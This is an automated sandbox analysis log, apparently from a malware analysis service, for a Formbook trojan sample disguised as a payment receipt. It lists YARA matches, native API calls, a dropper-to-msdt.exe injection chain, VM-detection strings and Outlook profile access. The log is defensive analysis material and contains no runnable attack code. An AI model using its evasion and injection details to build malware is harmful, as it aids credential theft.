          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: fcvvthv.exe PID: 2828, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: msdt.exe PID: 5440, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: String function: 00A5B150 appears 72 times
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_0041E037 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_0041E0E7 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_0041DF07 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_0041DFB7 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_004012A5 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_004014E9 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_0041DF01 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A998F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A995D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A997A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A998A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A9B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A999D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A9A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A995F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A9AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A996D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A9A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A99770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A9A770 NtOpenThread,
          Source: payment_copy2_receipt.exe | ReversingLabs: Detection: 53%
          Source: payment_copy2_receipt.exe | Virustotal: Detection: 38%
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | File read: C:\Users\user\Desktop\payment_copy2_receipt.exe
          Source: payment_copy2_receipt.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\payment_copy2_receipt.exe C:\Users\user\Desktop\payment_copy2_receipt.exe
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeFile created: C:\Users\user~1\AppData\Local\Temp\nshAD15.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@6/5
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCommand line argument: ~nA
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: msdt.pdbGCTL source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: fcvvthv.exe, 00000001.00000003.253544929.0000000002620000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000001.00000003.245524728.0000000002780000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: fcvvthv.exe, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_0040AB96 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_004210FC push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00421149 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00421152 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_004211B3 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_0042225A push dword ptr [3115C0DBh]; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_0041B2F0 push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_004054F6 pushad ; retf 007Ah
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00409DDD push ss; retf
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_004056A2 pushfd ; retf
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00405700 pushfd ; retf
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_0041A721 push eax; retf
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_0041A739 push eax; retf
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AAD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | File created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A86A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | API coverage: 7.2 %
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | API coverage: 8.5 %
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Code function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Code function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_00410290 FindFirstFileExW,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | API call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000000.340277436.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.310477461.0000000007B66000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
          Source: explorer.exe, 00000004.00000000.335776524.0000000005FE0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.310698898.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.305057483.0000000005EF4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.310698898.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
          Source: explorer.exe, 00000004.00000000.335575744.0000000005F12000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_0040A932 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_0041265A GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A86A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_0040EC98 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_0041133B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_00B80019 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_00B80005 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_00B8007A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_00B80149 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A59080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AEB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
